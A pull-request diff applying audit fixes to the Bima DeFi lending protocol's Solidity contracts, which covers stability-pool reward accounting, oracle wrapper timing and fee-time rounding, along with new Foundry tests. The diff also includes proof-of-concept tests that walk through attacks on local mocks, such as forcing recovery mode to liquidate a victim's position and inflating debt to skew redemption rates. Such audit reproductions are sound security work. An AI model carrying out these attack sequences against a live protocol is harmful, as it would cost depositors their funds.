### PR TITLE
BitsLabs audit fixes

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,18 +1,7 @@
-# Sample Hardhat Project
-
-This project demonstrates a basic Hardhat use case. It comes with a sample contract, a test for that contract, and a Hardhat Ignition module that deploys that contract.
-
-Try running some of the following tasks:
-
-```shell
-npx hardhat help
-npx hardhat test
-REPORT_GAS=true npx hardhat test
-npx hardhat node
-npx hardhat ignition deploy ./ignition/modules/Lock.ts
-```
+# Bima Protocol
 
 Run unit tests and coverage report with:
+
 ```shell
 forge test --no-match-contract TroveManagerSanityTest
 

--- a/contracts/core/StabilityPool.sol
+++ b/contracts/core/StabilityPool.sol
@@ -697,6 +697,8 @@ contract StabilityPool is IStabilityPool, BabelOwnable, SystemStart {
 
             // add additional calculation to stored pending reward already in output
             reward += (initialDeposit * (firstPortion + secondPortion)) / snapshots.P / BIMA_DECIMAL_PRECISION;
+        } else {
+            reward += _claimableReward(_depositor); 
         }
     }
 

--- a/contracts/core/StabilityPool.sol
+++ b/contracts/core/StabilityPool.sol
@@ -678,13 +678,15 @@ contract StabilityPool is IStabilityPool, BabelOwnable, SystemStart {
         if(totalDebt != 0 && initialDeposit != 0) {
             uint256 babelNumerator = (_vestedEmissions() * BIMA_DECIMAL_PRECISION) + lastBabelError;
             uint256 babelPerUnitStaked = babelNumerator / totalDebt;
-            uint256 marginalBabelGain = babelPerUnitStaked * P;
 
             Snapshots memory snapshots = depositSnapshots[_depositor];
             uint128 epochSnapshot = snapshots.epoch;
             uint128 scaleSnapshot = snapshots.scale;
             uint256 firstPortion;
             uint256 secondPortion;
+
+            uint256 marginalBabelGain = epochSnapshot == currentEpoch ? babelPerUnitStaked * P : 0;
+
             if (scaleSnapshot == currentScale) {
                 firstPortion = epochToScaleToG[epochSnapshot][scaleSnapshot] - snapshots.G + marginalBabelGain;
                 secondPortion = epochToScaleToG[epochSnapshot][scaleSnapshot + 1] / BIMA_SCALE_FACTOR;

--- a/contracts/core/StorkOracleWrapper.sol
+++ b/contracts/core/StorkOracleWrapper.sol
@@ -59,7 +59,7 @@ contract StorkOracleWrapper is IAggregatorV3Interface {
     (uint64 timestampNs, int192 quantizedValue) = storkOracle.getTemporalNumericValueV1(encodedAssetId);
 
     answer = int256(quantizedValue);
-    updatedAt = timestampNs / 1e9 - 1 minutes;
+    updatedAt = timestampNs / 1e9 - 1 seconds;
     startedAt = updatedAt;
     roundId = _roundId;
     answeredInRound = _roundId;
@@ -75,7 +75,7 @@ contract StorkOracleWrapper is IAggregatorV3Interface {
     answer = int256(quantizedValue);
     updatedAt = timestampNs / 1e9;
     startedAt = updatedAt;
-    roundId = uint80(updatedAt / 1 minutes); // increment round every 1 minute
+    roundId = uint80(updatedAt / 1 seconds); // increment round every second
     answeredInRound = roundId;
   }
 }

--- a/contracts/core/TroveManager.sol
+++ b/contracts/core/TroveManager.sol
@@ -632,7 +632,9 @@ contract TroveManager is ITroveManager, BabelBase, BabelOwnable, SystemStart {
         uint256 timePassed = block.timestamp - lastFeeOperationTime;
 
         if (timePassed >= SECONDS_IN_ONE_MINUTE) {
-            lastFeeOperationTime = block.timestamp;
+            uint256 minutesPassed = timePassed / SECONDS_IN_ONE_MINUTE;
+            
+            lastFeeOperationTime += minutesPassed * SECONDS_IN_ONE_MINUTE;
             emit LastFeeOpTimeUpdated(block.timestamp);
         }
     }

--- a/test/foundry/StorkOracleWrapper.t.sol
+++ b/test/foundry/StorkOracleWrapper.t.sol
@@ -41,7 +41,7 @@ contract StorkOracleWrapperTest is Test {
 
     (uint80 roundId, int256 answer, uint256 startedAt, uint256 updatedAt, ) = storkOracleWrapper.latestRoundData();
 
-    assertEq(roundId, timestampNs / 1e9 / 1 minutes);
+    assertEq(roundId, timestampNs / 1e9 / 1 seconds);
     assertEq(answer, quantizedValue);
     assertEq(startedAt, timestampNs / 1e9);
     assertEq(updatedAt, timestampNs / 1e9);
@@ -54,8 +54,8 @@ contract StorkOracleWrapperTest is Test {
 
     assertEq(roundId, _roundId);
     assertEq(answer, quantizedValue);
-    assertEq(startedAt, timestampNs / 1e9 - 1 minutes);
-    assertEq(updatedAt, timestampNs / 1e9 - 1 minutes);
+    assertEq(startedAt, timestampNs / 1e9 - 1 seconds);
+    assertEq(updatedAt, timestampNs / 1e9 - 1 seconds);
   }
 
   function testFlow() public {

--- a/test/foundry/StorkOracleWrapper.t.sol
+++ b/test/foundry/StorkOracleWrapper.t.sol
@@ -20,7 +20,7 @@ contract StorkOracleWrapperTest is Test {
   string HOLESKY_RPC_URL = vm.envString("HOLESKY_RPC_URL");
 
   function setUp() public {
-    vm.createSelectFork(HOLESKY_RPC_URL, 	2184438);
+    vm.createSelectFork(HOLESKY_RPC_URL);
 
     storkOracle = IStorkOracle(0xacC0a0cF13571d30B4b8637996F5D6D774d4fd62);
     encodedAssetId = bytes32(0x7404e3d104ea7841c3d9e6fd20adfe99b4ad586bc08d8f3bd3afef894cf184de);
@@ -66,29 +66,17 @@ contract StorkOracleWrapperTest is Test {
     address borrowOperationsAddress = 0x98cb20D30da0389028EB71eF299B688979F5cB8b;
     address priceFeedAddress = 0xEdd95b1325140Eb6c06d8C738DE98accb2104dFB;
 
-    (/*uint80 roundId1*/, int256 answer, , /*uint256 updatedAt*/, ) = IAggregatorV3Interface(oracleAddress).latestRoundData();
-    // console.log("ROUND ID AND ANSWER AND UPDATED AT FROM ORACLE: ");
-    // console.log(roundId1);
-    console.log(answer);
-    // console.log(updatedAt);
-
-    console.log("FETCHING PRICE");
+    IAggregatorV3Interface(oracleAddress).latestRoundData();
 
     PriceFeed(priceFeedAddress).fetchPrice(collateralAddress);
 
-    console.log("PRICE FETCHED");
-
-    console.log("APPROVING COLLATERAL");
-
-    vm.prank(0x39d2770AbcC456f6C6be820705eD966592E0ad96); // This address holds the mock collateral token
     IERC20(collateralAddress).approve(borrowOperationsAddress, 1e18);
 
-    console.log("OPENING TROVE");
+    deal(collateralAddress, address(this), 1e18, true);
 
-    vm.prank(0x39d2770AbcC456f6C6be820705eD966592E0ad96);
     IBorrowerOperations(borrowOperationsAddress).openTrove(
       ITroveManager(troveManagerAddress),
-      0x39d2770AbcC456f6C6be820705eD966592E0ad96,
+      address(this),
       0.1e18,
       1e18,
       10_000e18,
@@ -96,7 +84,7 @@ contract StorkOracleWrapperTest is Test {
       address(0)
     );
 
-    console.log(IERC20(collateralAddress).balanceOf(0x39d2770AbcC456f6C6be820705eD966592E0ad96));
-    console.log(ITroveManager(troveManagerAddress).debtToken().balanceOf(0x39d2770AbcC456f6C6be820705eD966592E0ad96));
+    console.log(IERC20(collateralAddress).balanceOf(address(this)));
+    console.log(ITroveManager(troveManagerAddress).debtToken().balanceOf(address(this)));
   }
 }

--- a/test/foundry/StorkOracleWrapperMocked.t.sol
+++ b/test/foundry/StorkOracleWrapperMocked.t.sol
@@ -1,0 +1,109 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.19;
+
+import {TestSetup} from "./TestSetup.sol";
+
+import {StorkOracleWrapper, IStorkOracle} from "../../contracts/core/StorkOracleWrapper.sol";
+import {MockERC20} from "forge-std/mocks/MockERC20.sol";
+
+import {console} from "forge-std/console.sol";
+
+contract MockStorkOracle {
+  uint64 public timestampNs;
+  int192 public quantizedValue;
+
+  function getTemporalNumericValueV1(bytes32) external view returns (uint64, int192) {
+    return (timestampNs, quantizedValue);
+  }
+
+  function setPrice(int192 _quantizedValue) public {
+    timestampNs = uint64(block.timestamp * 1e9);
+    quantizedValue = _quantizedValue;
+  }
+}
+
+contract StorkOracleWrapperMockedTest is TestSetup {
+  MockStorkOracle public storkOracle;
+  StorkOracleWrapper public storkOracleWrapper;
+
+  bytes32 public encodedAssetId;
+
+  function testInitialState() public {
+    _setUp();
+
+    assertEq(address(storkOracleWrapper.storkOracle()), address(storkOracle));
+    assertEq(storkOracleWrapper.encodedAssetId(), bytes32(0));
+    assertEq(storkOracleWrapper.decimals(), storkOracleWrapper.DECIMAL_PRECISION());
+    assertEq(storkOracleWrapper.description(), "AggregatorV3Interface Wrapper for Stork Oracle");
+    assertEq(storkOracleWrapper.version(), 1);
+  }
+
+  function test_latestRoundData(int192 price, uint32 blockTimestamp) public {
+    vm.warp(blockTimestamp);
+
+    _setUp();
+
+    storkOracle.setPrice(price);
+
+    (uint80 roundId, int256 answer, uint256 startedAt, uint256 updatedAt, ) = storkOracleWrapper.latestRoundData();
+
+    assertEq(block.timestamp, blockTimestamp);
+
+    assertEq(roundId, block.timestamp / 1 seconds);
+    assertEq(answer, price);
+    assertEq(startedAt, block.timestamp);
+    assertEq(updatedAt, block.timestamp);
+  }
+
+  function test_roundData(int192 price, uint32 blockTimestamp, uint80 _roundId) public {
+    vm.assume(blockTimestamp > 100);
+
+    vm.warp(blockTimestamp);
+
+    _setUp();
+
+    storkOracle.setPrice(price);
+
+    (uint80 roundId, int256 answer, uint256 startedAt, uint256 updatedAt, ) = storkOracleWrapper.getRoundData(_roundId);
+
+    assertEq(block.timestamp, blockTimestamp);
+
+    assertEq(roundId, _roundId);
+    assertEq(answer, price);
+    assertEq(startedAt, block.timestamp - 1 seconds);
+    assertEq(updatedAt, block.timestamp - 1 seconds);
+  }
+
+  // Test how the PriceFeed contract will handle the price change, if the new price has been set under a minute
+  function test_PriceChangeUnderMinute() public {
+    _setUp();
+
+    vm.startPrank(users.owner);
+
+    MockERC20 collateral = new MockERC20();
+
+    storkOracle.setPrice(60_000e18);
+
+    priceFeed.setOracle(address(collateral), address(storkOracleWrapper), 80000, bytes4(0x00000000), 18, false);
+
+    assertEq(priceFeed.fetchPrice(address(collateral)), 60_000e18);
+
+    skip(1.1 minutes);
+
+    storkOracle.setPrice(70_000e18);
+
+    assertEq(priceFeed.fetchPrice(address(collateral)), 70_000e18);
+
+    skip(0.1 minutes);
+
+    storkOracle.setPrice(10_000e18);
+
+    assertEq(priceFeed.fetchPrice(address(collateral)), 10_000e18);
+  }
+
+  function _setUp() internal {
+    storkOracle = new MockStorkOracle();
+
+    storkOracleWrapper = new StorkOracleWrapper(address(storkOracle), bytes32(0));
+  }
+}

--- a/test/foundry/poc.t.sol
+++ b/test/foundry/poc.t.sol
@@ -338,77 +338,78 @@ contract PoCTest is TestSetup {
     assertTrue(claimableRewards > 0);
   }
 
-  //   function test_poc_stabilityPool_incorrectMarginalBabelGain() public {
-  //     address user = users.user1;
-  //     address user2 = users.user2;
-  //     address user3 = makeAddr("User3");
-  //     deal(address(stakedBTC), user, 1e6 * 1e18);
-  //     deal(address(stakedBTC), user2, 1e6 * 1e18);
-  //     deal(address(stakedBTC), user3, 1e6 * 1e18);
+  function test_poc_stabilityPool_incorrectMarginalBabelGain() public {
+    address user = users.user1;
+    address user2 = users.user2;
+    address user3 = makeAddr("User3");
+    deal(address(stakedBTC), user, 1e6 * 1e18);
+    deal(address(stakedBTC), user2, 1e6 * 1e18);
+    deal(address(stakedBTC), user3, 1e6 * 1e18);
 
-  //     // Mock Babel Vault's allocateNewEmissions function for demonstration purposes
-  //     vm.mockCall(
-  //       address(babelVault),
-  //       abi.encodeWithSelector(IBabelVault.allocateNewEmissions.selector),
-  //       abi.encode(100e18 * 86400 * 7) // 100 tokens per week
-  //     );
+    // Mock Babel Vault's allocateNewEmissions function for demonstration purposes
+    vm.mockCall(
+      address(babelVault),
+      abi.encodeWithSelector(IBabelVault.allocateNewEmissions.selector),
+      abi.encode(100e18 * 86400 * 7) // 100 tokens per week
+    );
 
-  //     // Step 1: User opens a trove
-  //     vm.startPrank(user);
-  //     uint256 debtAmount = 50000e18; // 50,000 DEBT
-  //     _openTrove(sbtcTroveManager, debtAmount, 2e18);
+    // Step 1: User opens a trove
+    vm.startPrank(user);
+    uint256 debtAmount = 50000e18; // 50,000 DEBT
+    _openTrove(sbtcTroveManager, debtAmount, 2e18);
 
-  //     // Step 2: User deposits all borrowed DEBT into Stability Pool
-  //     stabilityPool.provideToSP(debtAmount - INIT_GAS_COMPENSATION);
+    // Step 2: User deposits all borrowed DEBT into Stability Pool
+    stabilityPool.provideToSP(debtAmount - INIT_GAS_COMPENSATION);
 
-  //     uint256 stabilityPoolBalanceBefore = stabilityPool.getTotalDebtTokenDeposits();
-  //     console.log("Stability Pool balance before liquidation:", stabilityPoolBalanceBefore);
+    uint256 stabilityPoolBalanceBefore = stabilityPool.getTotalDebtTokenDeposits();
+    console.log("Stability Pool balance before liquidation:", stabilityPoolBalanceBefore);
 
-  //     vm.startPrank(user2);
-  //     debtAmount = stabilityPoolBalanceBefore;
-  //     _openTrove(sbtcTroveManager, debtAmount, 2e18);
+    vm.startPrank(user2);
+    debtAmount = stabilityPoolBalanceBefore;
+    _openTrove(sbtcTroveManager, debtAmount, 2e18);
 
-  //     // Step 3: Simulate price drop to make the trove undercollateralized
-  //     vm.warp(block.timestamp + 1);
-  //     _updateOracle(59000 * 1e8);
+    // Step 3: Simulate price drop to make the trove undercollateralized
+    vm.warp(block.timestamp + 1);
+    _updateOracle(59000 * 1e8);
 
-  //     // Step 4: Triggers liquidation
-  //     liquidationMgr.liquidate(sbtcTroveManager, user2);
+    // Step 4: Triggers liquidation
+    liquidationMgr.liquidate(sbtcTroveManager, user2);
 
-  //     // Step 5: Check Stability Pool balance after liquidation
-  //     uint256 stabilityPoolBalanceAfter = stabilityPool.getTotalDebtTokenDeposits();
-  //     console.log("Stability Pool balance after liquidation:", stabilityPoolBalanceAfter);
+    // Step 5: Check Stability Pool balance after liquidation
+    uint256 stabilityPoolBalanceAfter = stabilityPool.getTotalDebtTokenDeposits();
+    console.log("Stability Pool balance after liquidation:", stabilityPoolBalanceAfter);
 
-  //     // Assert that the Stability Pool is emptied
-  //     assertEq(stabilityPoolBalanceAfter, 0, "Stability Pool should be empty after liquidation");
+    // Assert that the Stability Pool is emptied
+    assertEq(stabilityPoolBalanceAfter, 0, "Stability Pool should be empty after liquidation");
 
-  //     // Step 6: Check claimable rewards
-  //     // The correct amount should be more than zero
-  //     uint256 claimableRewards = stabilityPool.claimableReward(user);
-  //     console.log("User claimable rewards:", claimableRewards);
+    // Step 6: Check claimable rewards
+    // The correct amount should be more than zero
+    uint256 claimableRewards = stabilityPool.claimableReward(user);
+    console.log("User claimable rewards:", claimableRewards);
 
-  //     // Step 7: User2 opens a trove and deposits into Stability Pool
-  //     vm.startPrank(user2);
-  //     debtAmount = 10000e18;
-  //     _openTrove(sbtcTroveManager, debtAmount, 2e18);
-  //     stabilityPool.provideToSP(debtAmount - INIT_GAS_COMPENSATION);
+    // Step 7: User2 opens a trove and deposits into Stability Pool
+    vm.startPrank(user2);
+    debtAmount = 10000e18;
+    _openTrove(sbtcTroveManager, debtAmount, 2e18);
+    stabilityPool.provideToSP(debtAmount - INIT_GAS_COMPENSATION);
 
-  //     // Step 8: User3 opens a trove
-  //     vm.startPrank(user3);
-  //     debtAmount = 2000e18;
-  //     _openTrove(sbtcTroveManager, debtAmount, 2e18);
+    // Step 8: User3 opens a trove
+    vm.startPrank(user3);
+    debtAmount = 2000e18;
+    _openTrove(sbtcTroveManager, debtAmount, 2e18);
 
-  //     // Step 9: Simulate price drop to make the user3's trove undercollateralized
-  //     vm.warp(block.timestamp + 1);
-  //     _updateOracle(58000 * 1e8);
+    // Step 9: Simulate price drop to make the user3's trove undercollateralized
+    vm.warp(block.timestamp + 1);
+    _updateOracle(58000 * 1e8);
 
-  //     // Step 10: Triggers liquidation
-  //     liquidationMgr.liquidate(sbtcTroveManager, user3);
+    // Step 10: Triggers liquidation
+    liquidationMgr.liquidate(sbtcTroveManager, user3);
 
-  //     // Step 11: Check claimable rewards
-  //     // The correct claimable rewards should be the same as the previous amount as
-  //     // the user's deposit was already emptied in the previous epoch
-  //     claimableRewards = stabilityPool.claimableReward(user);
-  //     console.log("User claimable rewards:", claimableRewards);
-  //   }
+    // Step 11: Check claimable rewards
+    // The correct claimable rewards should be the same as the previous amount as
+    // the user's deposit was already emptied in the previous epoch
+    uint256 claimableRewards2 = stabilityPool.claimableReward(user);
+    console.log("User claimable rewards:", claimableRewards2);
+    assertEq(claimableRewards, claimableRewards2);
+  }
 }

--- a/test/foundry/poc.t.sol
+++ b/test/foundry/poc.t.sol
@@ -213,51 +213,51 @@ contract PoCTest is TestSetup {
     _printTCR();
   }
 
-  //   /**
-  //    * @dev Test case: Normal redemption process
-  //    */
-  //   function test_poc_normalRedemption() public {
-  //     vm.startPrank(attacker);
+  /**
+   * @dev Test case: Normal redemption process
+   */
+  function test_poc_normalRedemption() public {
+    vm.startPrank(attacker);
 
-  //     // Step 1: Open a trove
-  //     uint256 debtAmount = 100000e18;
-  //     _openTrove(sbtcTroveManager, debtAmount, 2e18);
+    // Step 1: Open a trove
+    uint256 debtAmount = 100000e18;
+    _openTrove(sbtcTroveManager, debtAmount, 2e18);
 
-  //     // Step 2: Perform redemption
-  //     uint256 redemptionAmount = debtAmount - INIT_GAS_COMPENSATION; // Subtracting gas compensation
-  //     _redeemCollateral(sbtcTroveManager, redemptionAmount);
+    // Step 2: Perform redemption
+    uint256 redemptionAmount = debtAmount - INIT_GAS_COMPENSATION; // Subtracting gas compensation
+    _redeemCollateral(sbtcTroveManager, redemptionAmount);
 
-  //     uint256 redemptionRate = sbtcTroveManager.getRedemptionRateWithDecay();
-  //     console.log("Redemption Rate: %18e%", redemptionRate);
-  //   }
+    uint256 redemptionRate = sbtcTroveManager.getRedemptionRateWithDecay();
+    console.log("Redemption Rate: %18e%", redemptionRate);
+  }
 
-  //   /**
-  //    * @dev Test case: Redemption with debt inflation
-  //    */
-  //   function test_poc_redemptionWithDebtInflation() public {
-  //     vm.startPrank(attacker);
+  /**
+   * @dev Test case: Redemption with debt inflation
+   */
+  function test_poc_redemptionWithDebtInflation() public {
+    vm.startPrank(attacker);
 
-  //     // Step 1: Open a trove
-  //     uint256 debtAmount = 100_000e18;
-  //     _openTrove(sbtcTroveManager, debtAmount, 2e18);
+    // Step 1: Open a trove
+    uint256 debtAmount = 100_000e18;
+    _openTrove(sbtcTroveManager, debtAmount, 2e18);
 
-  //     // Step 2: Attacker2 opens a large trove to inflate total debt
-  //     vm.startPrank(attacker2);
-  //     uint256 largeDebtAmount = 500_000e18; // 0.5M DEBT
-  //     _openTrove(sbtcTroveManager, largeDebtAmount, 3e18);
+    // Step 2: Attacker2 opens a large trove to inflate total debt
+    vm.startPrank(attacker2);
+    uint256 largeDebtAmount = 500_000e18; // 0.5M DEBT
+    _openTrove(sbtcTroveManager, largeDebtAmount, 3e18);
 
-  //     // Step 3: Perform redemption
-  //     vm.startPrank(attacker);
-  //     uint256 redemptionAmount = debtAmount - INIT_GAS_COMPENSATION; // Subtracting gas compensation
-  //     _redeemCollateral(sbtcTroveManager, redemptionAmount);
+    // Step 3: Perform redemption
+    vm.startPrank(attacker);
+    uint256 redemptionAmount = debtAmount - INIT_GAS_COMPENSATION; // Subtracting gas compensation
+    _redeemCollateral(sbtcTroveManager, redemptionAmount);
 
-  //     // Step 4: Attacker2 closes their large trove
-  //     vm.startPrank(attacker2);
-  //     borrowerOps.closeTrove(sbtcTroveManager, attacker2);
+    // Step 4: Attacker2 closes their large trove
+    vm.startPrank(attacker2);
+    borrowerOps.closeTrove(sbtcTroveManager, attacker2);
 
-  //     uint256 redemptionRate = sbtcTroveManager.getRedemptionRateWithDecay();
-  //     console.log("Manipulated Redemption Rate: %18e%", redemptionRate);
-  //   }
+    uint256 redemptionRate = sbtcTroveManager.getRedemptionRateWithDecay();
+    console.log("Manipulated Redemption Rate: %18e%", redemptionRate);
+  }
 
   /**
    * @dev Test case: Stork Oracle stale price

--- a/test/foundry/poc.t.sol
+++ b/test/foundry/poc.t.sol
@@ -256,34 +256,32 @@ contract PoCTest is TestSetup {
   //     console.log("Manipulated Redemption Rate: %18e%", redemptionRate);
   //   }
 
-  //   /**
-  //    * @dev Test case: Stork Oracle stale price
-  //    */
-  //   function test_poc_storkOracleStalePrice() public {
-  //     vm.startPrank(users.owner);
+  /**
+   * @dev Test case: Stork Oracle stale price
+   */
+  function test_poc_storkOracleStalePrice() public {
+    vm.startPrank(users.owner);
 
-  //     // Create mock Stork Oracle and wrapper
-  //     MockStorkOracle mockOracle = new MockStorkOracle();
-  //     StorkOracleWrapper wrapper = new StorkOracleWrapper(address(mockOracle), bytes32(0));
+    // Create mock Stork Oracle and wrapper
+    MockStorkOracle mockOracle = new MockStorkOracle();
+    StorkOracleWrapper wrapper = new StorkOracleWrapper(address(mockOracle), bytes32(0));
 
-  //     // Set initial price to $60,000
-  //     mockOracle.set(uint64(block.timestamp * 1e9), 60000 * 1e18);
+    // Set initial price to $60,000
+    mockOracle.set(uint64(block.timestamp * 1e9), 60_000e18);
 
-  //     // Configure price feed to use the Stork Oracle wrapper
-  //     priceFeed.setOracle(address(stakedBTC), address(wrapper), 80000, bytes4(0), 8, false);
+    // Configure price feed to use the Stork Oracle wrapper
+    priceFeed.setOracle(address(stakedBTC), address(wrapper), 80_000, bytes4(0), 8, false);
 
-  //     uint256 btcPrice = priceFeed.fetchPrice(address(stakedBTC));
-  //     console.log("Price before fluctuation =", btcPrice);
+    assertEq(priceFeed.fetchPrice(address(stakedBTC)), 60_000e18);
 
-  //     // Simulate time passing (1 second)
-  //     vm.warp(block.timestamp + 1);
+    // Simulate time passing (1 second)
+    vm.warp(block.timestamp + 1);
 
-  //     // Update oracle price to $50,000
-  //     mockOracle.set(uint64(block.timestamp * 1e9), 50000 * 1e18);
+    // Update oracle price to $50,000
+    mockOracle.set(uint64(block.timestamp * 1e9), 50_000e18);
 
-  //     btcPrice = priceFeed.fetchPrice(address(stakedBTC));
-  //     console.log("Price after fluctuation (should be stale) =", btcPrice);
-  //   }
+    assertEq(priceFeed.fetchPrice(address(stakedBTC)), 50_000e18);
+  }
 
   /**
    * @dev Test case: Stability Pool emptied by liquidation return incorrect claimable amount

--- a/test/foundry/poc.t.sol
+++ b/test/foundry/poc.t.sol
@@ -1,0 +1,414 @@
+pragma solidity 0.8.19;
+
+import {console} from "forge-std/console.sol";
+import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+import {TestSetup} from "./TestSetup.sol";
+import {IFactory} from "../../contracts/interfaces/IFactory.sol";
+import {StakedBTC} from "../../contracts/mock/StakedBTC.sol";
+import {BorrowerOperations} from "../../contracts/core/BorrowerOperations.sol";
+import {TroveManager} from "../../contracts/core/TroveManager.sol";
+import {MultiCollateralHintHelpers} from "../../contracts/core/helpers/MultiCollateralHintHelpers.sol";
+import {StorkOracleWrapper} from "../../contracts/core/StorkOracleWrapper.sol";
+import {IBabelVault} from "../../contracts/interfaces/IVault.sol";
+
+/**
+ * @title MockStorkOracle
+ * @dev A mock implementation of the Stork Oracle for testing purposes
+ */
+contract MockStorkOracle {
+  uint64 private _timestampNs;
+  int192 private _quantizedValue;
+
+  function set(uint64 timestampNs, int192 quantizedValue) external {
+    _timestampNs = timestampNs;
+    _quantizedValue = quantizedValue;
+  }
+
+  function getTemporalNumericValueV1(bytes32) external view returns (uint64 timestampNs, int192 quantizedValue) {
+    return (_timestampNs, _quantizedValue);
+  }
+}
+
+/**
+ * @title PoCTest
+ * @dev Test contract for demonstrating vulnerabilities
+ */
+contract PoCTest is TestSetup {
+  address attacker;
+  address victim;
+  address attacker2;
+  StakedBTC stakedBTC2;
+  TroveManager sbtcTroveManager;
+  TroveManager sbtc2TroveManager;
+  MultiCollateralHintHelpers hintHelpers;
+
+  function setUp() public override {
+    super.setUp();
+    hintHelpers = new MultiCollateralHintHelpers(address(borrowerOps), INIT_GAS_COMPENSATION);
+
+    attacker = makeAddr("Attacker");
+    victim = makeAddr("Victim");
+    attacker2 = makeAddr("Attacker2");
+
+    vm.startPrank(users.owner);
+
+    // Deploy another troveManager instance
+    stakedBTC2 = new StakedBTC();
+    IFactory.DeploymentParams memory params = IFactory.DeploymentParams({
+      minuteDecayFactor: 999037758833783000,
+      redemptionFeeFloor: 5e15,
+      maxRedemptionFee: 1e18,
+      borrowingFeeFloor: 0,
+      maxBorrowingFee: 0,
+      interestRateInBps: 0,
+      maxDebt: 1_000_000e18, // 1M USD
+      MCR: 2e18 // 200%
+    });
+
+    // Set up price feed for stakedBTC2
+    priceFeed.setOracle(
+      address(stakedBTC2),
+      address(mockOracle),
+      80000, // heartbeat
+      bytes4(0x00000000), // Read pure data assume stBTC is 1:1 with BTC
+      18, // sharePriceDecimals
+      false // _isEthIndexed
+    );
+
+    // Deploy new instance with stakedBTC2
+    factory.deployNewInstance(
+      address(stakedBTC2),
+      address(priceFeed),
+      address(0), // customTroveManagerImpl
+      address(0), // customSortedTrovesImpl
+      params
+    );
+
+    // Distribute tokens to users
+    deal(address(stakedBTC), users.owner, 1e6 * 1e18);
+    deal(address(stakedBTC), attacker, 1e6 * 1e18);
+    deal(address(stakedBTC), victim, 1e6 * 1e18);
+    deal(address(stakedBTC), attacker2, 1e6 * 1e18);
+    deal(address(stakedBTC2), users.owner, 1e6 * 1e18);
+    deal(address(stakedBTC2), attacker, 1e6 * 1e18);
+
+    // Get TroveManager instances
+    sbtcTroveManager = TroveManager(factory.troveManagers(0));
+    sbtc2TroveManager = TroveManager(factory.troveManagers(1));
+
+    // Open initial troves
+    _openTrove(sbtcTroveManager, 100000e18, 3e18);
+    _openTrove(sbtc2TroveManager, 100000e18, 3e18);
+
+    // Deposit debt token into the stability pool
+    uint256 debtTokenBalance = debtToken.balanceOf(users.owner);
+    debtToken.approve(address(stabilityPool), debtTokenBalance);
+    stabilityPool.provideToSP(debtTokenBalance);
+
+    // Skip bootstrap period
+    vm.warp(block.timestamp + 14 days + 1);
+    _updateOracle(60000 * 1e8);
+  }
+
+  /**
+   * @dev Updates the mock oracle with a new price
+   * @param price The new price to set
+   */
+  function _updateOracle(int256 price) internal {
+    (uint80 roundId, , , , ) = mockOracle.latestRoundData();
+    mockOracle.setResponse(roundId + 1, price, block.timestamp, block.timestamp, roundId + 1);
+  }
+
+  /**
+   * @dev Opens a new trove
+   * @param troveManager The TroveManager instance
+   * @param debtAmount The amount of debt to borrow
+   * @param cr The collateral ratio
+   */
+  function _openTrove(TroveManager troveManager, uint256 debtAmount, uint256 cr) internal {
+    IERC20 collateral = troveManager.collateralToken();
+    uint256 price = troveManager.fetchPrice();
+    bool inRecoveryMode = borrowerOps.checkRecoveryMode(price);
+    uint256 borrowingRate = inRecoveryMode ? 0 : troveManager.getBorrowingRateWithDecay();
+    uint256 gasCompensation = INIT_GAS_COMPENSATION;
+    uint256 adjustedDebtAmount = ((debtAmount - gasCompensation) * 1e18 - 1) / (1e18 + borrowingRate) + 1;
+    uint256 collateralAmount = (debtAmount * cr) / price + 1;
+
+    collateral.approve(address(borrowerOps), collateralAmount);
+    (, address caller, ) = vm.readCallers();
+    borrowerOps.openTrove(troveManager, caller, 1e18, collateralAmount, adjustedDebtAmount, address(0), address(0));
+  }
+
+  /**
+   * @dev Redeems collateral from a trove
+   * @param troveManager The TroveManager instance
+   * @param redemptionAmount The amount of debt to redeem
+   */
+  function _redeemCollateral(TroveManager troveManager, uint256 redemptionAmount) internal {
+    uint256 price = troveManager.fetchPrice();
+    (address firstRedemptionHint, uint256 partialRedemptionHintNICR, uint256 truncatedDebtAmount) = hintHelpers
+      .getRedemptionHints(troveManager, redemptionAmount, price, 0);
+
+    troveManager.redeemCollateral(
+      truncatedDebtAmount,
+      firstRedemptionHint,
+      address(0),
+      address(0),
+      partialRedemptionHintNICR,
+      0,
+      1e18
+    );
+  }
+
+  /**
+   * @dev Prints the Total Collateral Ratio (TCR)
+   */
+  function _printTCR() internal {
+    console.log("TCR =", borrowerOps.getTCR());
+  }
+
+  //   /**
+  //    * @dev Test case: Forcing the system into Recovery Mode
+  //    */
+  //   function test_poc_forcingSystemIntoRecoveryMode() public {
+  //     // Step 1: Victim opens a trove with ICR lower than CCR
+  //     vm.startPrank(victim);
+  //     _openTrove(sbtcTroveManager, 100000e18, 2e18);
+
+  //     // Step 2: Attacker opens a minimal position with CR slightly above 225%
+  //     vm.startPrank(attacker);
+  //     _openTrove(sbtc2TroveManager, 2000e18, 2.26e18);
+
+  //     // Step 3: Open a large position to bring TCR to exactly 225%
+  //     (uint256 totalPricedCollateral, uint256 totalDebt) = borrowerOps.getGlobalSystemBalances();
+  //     uint256 debtAmount = ((totalPricedCollateral - (225 * totalDebt * 1e18) / 100) * 100) / (225 - 200) / 1e18;
+  //     uint256 CR = 2e18;
+  //     _openTrove(sbtcTroveManager, debtAmount, CR);
+
+  //     console.log("TCR after opening large position:");
+  //     _printTCR();
+
+  //     // Step 4: Redeem the position opened in step 2 to trigger Recovery Mode
+  //     (, uint256 attackerDebt) = sbtc2TroveManager.getTroveCollAndDebt(attacker);
+  //     uint256 redemptionAmount = attackerDebt - INIT_GAS_COMPENSATION; // 200e18 is the gas compensation
+  //     _redeemCollateral(sbtc2TroveManager, redemptionAmount);
+
+  //     console.log("TCR after redemption (should be in Recovery Mode):");
+  //     _printTCR();
+
+  //     // Step 5: Liquidate victim's trove (CR < 225%)
+  //     liquidationMgr.liquidate(sbtcTroveManager, victim);
+
+  //     console.log("Victim's trove liquidated");
+
+  //     // Verify victim's trove is closed
+  //     (uint256 victimColl, uint256 victimDebt) = sbtcTroveManager.getTroveCollAndDebt(victim);
+  //     assertEq(victimColl, 0, "Victim's trove collateral should be zero");
+  //     assertEq(victimDebt, 0, "Victim's trove debt should be zero");
+
+  //     console.log("Final TCR:");
+  //     _printTCR();
+  //   }
+
+  //   /**
+  //    * @dev Test case: Normal redemption process
+  //    */
+  //   function test_poc_normalRedemption() public {
+  //     vm.startPrank(attacker);
+
+  //     // Step 1: Open a trove
+  //     uint256 debtAmount = 100000e18;
+  //     _openTrove(sbtcTroveManager, debtAmount, 2e18);
+
